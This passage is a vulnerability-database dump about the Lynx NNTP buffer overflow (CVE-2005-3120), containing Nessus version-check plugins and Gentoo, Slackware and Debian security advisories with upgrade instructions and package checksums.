value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"lynx\", pkgver:\"2.8.5-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"lynx\", pkgver:\"2.8.5-2ubuntu0.5.04\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"lynx\", pkgver:\"2.8.5-2ubuntu0.5.10\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lynx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T06:50:59", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities :\n\n - CVE-2004-1617\n Michal Zalewski discovered that lynx is not able to grok\n invalid HTML including a TEXTAREA tag with a large COLS\n value and a large tag name in an element that is not\n terminated, and loops forever trying to render the\n broken HTML.\n\n - CVE-2005-3120\n Ulf Harnhammar discovered a buffer overflow that can be\n remotely exploited. During the handling of Asian\n characters when connecting to an NNTP server lynx can be\n tricked to write past the boundary of a buffer which can\n lead to the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-1085.NASL", "href": "https://www.tenable.com/plugins/nessus/22627", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1085-1 : lynx-cur - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1085. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22627);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/08/02 13:32:19\");\n\n script_cve_id(\"CVE-2004-1617\", \"CVE-2005-3120\");\n script_bugtraq_id(11443);\n script_xref(name:\"DSA\", value:\"1085\");\n\n script_name(english:\"Debian DSA-1085-1 : lynx-cur - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities :\n\n - CVE-2004-1617\n Michal Zalewski discovered that lynx is not able to grok\n invalid HTML including a TEXTAREA tag with a large COLS\n value and a large tag name in an element that is not\n terminated, and loops forever trying to render the\n broken HTML.\n\n - CVE-2005-3120\n Ulf Harnhammar discovered a buffer overflow that can be\n remotely exploited. During the handling of Asian\n characters when connecting to an NNTP server lynx can be\n tricked to write past the boundary of a buffer which can\n lead to the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=296340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2004-1617\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1085\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lynx-cur package.\n\nFor the old stable distribution (woody) these problems have been fixed\nin version 2.8.5-2.5woody1.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 2.8.6-9sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lynx-cur\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lynx-cur\", reference:\"2.8.5-2.5woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"lynx-cur-wrapper\", reference:\"2.8.5-2.5woody1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lynx-cur\", reference:\"2.8.6-9sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"lynx-cur-wrapper\", reference:\"2.8.6-9sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T08:05:28", "bulletinFamily": "scanner", "description": "Ulf Harnhammar discovered a remote buffer overflow in lynx versions\n2.8.2 through 2.8.5.\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow,\nwith full control over EIP, EBX, EBP, ESI and EDI.\n\nTwo attack vectors to make a victim visit a URL to a dangerous news\nserver are: (a) *redirecting scripts*, where the victim visits some\nweb page and it redirects automatically to a malicious URL, and (b)\n*links in web pages*, where the victim visits some web page and\nselects a link on the page to a malicious URL. Attack vector (b) is\nhelped by the fact that Lynx does not automatically display where\nlinks lead to, unlike many graphical web browsers.\n\nThe updated packages have been patched to address this issue.\n\nUpdate :\n\nThe previous patchset had a bug in the patches themselves, which was\nuncovered by Klaus Singvogel of Novell/SUSE in auditing crashes on\nsome architectures.", "modified": "2019-12-02T00:00:00", "id": "MANDRAKE_MDKSA-2005-186.NASL", "href": "https://www.tenable.com/plugins/nessus/20057", "published": "2005-10-19T00:00:00", "title": "Mandrake Linux Security Advisory : lynx (MDKSA-2005:186-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:186. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20057);\n script_version (\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:32:48\");\n\n script_cve_id(\"CVE-2005-2665\", \"CVE-2005-3120\");\n script_xref(name:\"MDKSA\", value:\"2005:186-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : lynx (MDKSA-2005:186-1)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ulf Harnhammar discovered a remote buffer overflow in lynx versions\n2.8.2 through 2.8.5.\n\nWhen Lynx connects to an NNTP server to fetch information about the\navailable articles in a newsgroup, it will call a function called\nHTrjis() with the information from certain article headers. The\nfunction adds missing ESC characters to certain data, to support Asian\ncharacter sets. However, it does not check if it writes outside of the\nchar array buf, and that causes a remote stack-based buffer overflow,\nwith full control over EIP, EBX, EBP, ESI and EDI.\n\nTwo attack vectors to make a victim visit a URL to a dangerous news\nserver are: (a) *redirecting scripts*, where the victim visits some\nweb page and it redirects automatically to a malicious URL, and (b)\n*links in web pages*, where the victim visits some web page and\nselects a link on the page to a malicious URL. Attack vector (b) is\nhelped by the fact that Lynx does not automatically display where\nlinks lead to, unlike many graphical web browsers.\n\nThe updated packages have been patched to address this issue.\n\nUpdate :\n\nThe previous patchset had a bug in the patches themselves, which was\nuncovered by Klaus Singvogel of Novell/SUSE in auditing crashes on\nsome architectures.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lynx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", reference:\"lynx-2.8.5-1.2.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", reference:\"lynx-2.8.5-1.2.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", reference:\"lynx-2.8.5-4.2.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:44", "bulletinFamily": "unix", "description": "### Background\n\nLynx is a text-mode browser for the World Wide Web. It supports multiple URL types, including HTTP and NNTP URLs. \n\n### Description\n\nWhen accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters. \n\n### Impact\n\nAn attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Lynx users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/lynx-2.8.5-r1\"", "modified": "2005-10-17T00:00:00", "published": "2005-10-17T00:00:00", "id": "GLSA-200510-15", "href": "https://security.gentoo.org/glsa/200510-15", "type": "gentoo", "title": "Lynx: Buffer overflow in NNTP processing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2019-05-30T07:36:37", "bulletinFamily": "unix", "description": "New Lynx packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\nand -current to fix a security issue. An overflow could result in the\nexecution of arbitrary code when using Lynx to connect to a malicious NNTP\nserver.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/lynx-2.8.5rel.5-i486-1.tgz: Upgraded to lynx-2.8.5rel.5.\n Fixes an issue where the handling of Asian characters when using lynx to\n connect to an NNTP server (is this a common use?) could result in a buffer\n overflow causing the execution of arbitrary code.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nadccab862ff6c6f3e56dc5fe1c8e3f94 lynx-2.8.5rel.5-i386-1.tgz\n\nSlackware 9.0 package:\n35eff3269c1b3a3d77a42eb341e3b253 lynx-2.8.5rel.5-i386-1.tgz\n\nSlackware 9.1 package:\n7e1fbf1f8ea42b13c669efa82837f2a2 lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware 10.0 package:\n7d7093b6207351bc15be3effe40d1dae lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware 10.1 package:\ne762a5e53b7907c4e7a865e24c892eb4 lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware 10.2 package:\nd8c0987fce89f89908ac0965ba6e2155 lynx-2.8.5rel.5-i486-1.tgz\n\nSlackware -current package:\ne429d9138374a65a8621d8b2580e3a33 lynx-2.8.5rel.5-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg lynx-2.8.5rel.5-i486-1.tgz", "modified": "2005-11-06T13:03:17", "published": "2005-11-06T13:03:17", "id": "SSA-2005-310-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.423056", "title": "lynx", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-10-24T22:37:52", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 876-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 27th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lynx-ssl\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1 of lynx.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx-ssl package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2.dsc\n Size/MD5 checksum: 609 6256bc48e63d9120301c6bdae3316675\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2.diff.gz\n Size/MD5 checksum: 87627 69a835be9e783a6788fd3122ec4c51d4\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b.orig.tar.gz\n Size/MD5 checksum: 2557510 053a10f76b871e3944c11c7776da7f7a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_alpha.deb\n Size/MD5 checksum: 1617392 d07cb6f46da183ab5c66860d90dd48c5\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_arm.deb\n Size/MD5 checksum: 1491792 b20c7575d54e86838ddeff94622ce5ff\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_i386.deb\n Size/MD5 checksum: 1447102 0707d60cdc076a9078ecd198d9e185c5\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_ia64.deb\n Size/MD5 checksum: 1769060 9f621d66228be950732846918afb9b22\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_hppa.deb\n Size/MD5 checksum: 1559592 c2c35718ba34d173fadefd3ba428695b\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_m68k.deb\n Size/MD5 checksum: 1410534 86eff29224e043788f98a02f4af20402\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_mips.deb\n Size/MD5 checksum: 1511892 7fa8c96a81238e524e870dee74d07fa4\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_mipsel.deb\n Size/MD5 checksum: 1507808 5c7db52ed5910884679ec9ecc8606593\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_powerpc.deb\n Size/MD5 checksum: 1497302 f82ae7bc6ee25639bd8c18ab6c644fb5\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_s390.deb\n Size/MD5 checksum: 1468622 72b310726d3baecfe26ba27ce9f9f46a\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_sparc.deb\n Size/MD5 checksum: 1497394 83d65399cb15b48bcd9024f01e3f9400\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "modified": "2005-10-27T00:00:00", "published": "2005-10-27T00:00:00", "id": "DEBIAN:DSA-876-1:39741", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00272.html", "title": "[SECURITY] [DSA 876-1] New lynx-ssl packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:41", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 874-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 27th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lynx\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.dsc\n Size/MD5 checksum: 579 117f4e3d95a601741dc672012719042c\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.diff.gz\n Size/MD5 checksum: 14448 5e5d819520415baa0d91f75f0ee4f0af\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b.orig.tar.gz\n Size/MD5 checksum: 2557510 053a10f76b871e3944c11c7776da7f7a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_alpha.deb\n Size/MD5 checksum: 1610266 c887b1d0598b99fe1e3f45fedaaf3321\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_arm.deb\n Size/MD5 checksum: 1487698 fb290d8440ef3b2b59f10e270b1d7bb6\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_i386.deb\n Size/MD5 checksum: 1442878 31da62cb1f065acc2f65f2fd4481d530\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_ia64.deb\n Size/MD5 checksum: 1762578 e57e52ed11ea52b55d6a5ede09b466a8\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_hppa.deb\n Size/MD5 checksum: 1555440 4beb62a33cc2c0f00a45e69bed8b5591\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_m68k.deb\n Size/MD5 checksum: 1405626 7f8d46f3d143781364337b666a55fa42\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mips.deb\n Size/MD5 checksum: 1507782 ae2ce1ddbe4855967d050a3e64e42e26\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mipsel.deb\n Size/MD5 checksum: 1503970 08e80c500a4d57a4e47fc45dbf0ebfe3\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_powerpc.deb\n Size/MD5 checksum: 1491262 2b58dece4ae0a8a98b31e2f8eba40d13\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_s390.deb\n Size/MD5 checksum: 1463360 1e5419b8db89374ea1c96f1219fe6e15\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_sparc.deb\n Size/MD5 checksum: 1492728 f4da20fe1ac83ee9adf37d49bb896c63\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.dsc\n Size/MD5 checksum: 614 e7d5a14aafd2e9775c3175e44e3f9964\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.diff.gz\n Size/MD5 checksum: 14891 59cf146b8defbfa1b78df4306b951441\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5.orig.tar.gz\n Size/MD5 checksum: 2984352 5f516a10596bd52c677f9bfd9579bc28\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_alpha.deb\n Size/MD5 checksum: 1994554 8a9eb6cd8ee34ad17aa06b912b588659\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_amd64.deb\n Size/MD5 checksum: 1881684 5afcd53828326a0cb056681047bd48e6\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_arm.deb\n Size/MD5 checksum: 1852912 de530d45ce98e68932ec4624abd67201\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_i386.deb\n Size/MD5 checksum: 1852488 ba9125c2da9c21a8bcd173ff82948a28\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_ia64.deb\n Size/MD5 checksum: 2128374 156c023772481f6e9f8629c44082c94d\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_hppa.deb\n Size/MD5 checksum: 1909574 24bbbc72ab025249a3adaa7717b316ff\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_m68k.deb\n Size/MD5 checksum: 1780590 449249ca3e257a33a5a9d7da16379076\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mips.deb\n Size/MD5 checksum: 1894006 f30b06596b5ed9d881e1f3ba767aca2a\n\n Little endian MIPS architecture:\n\n 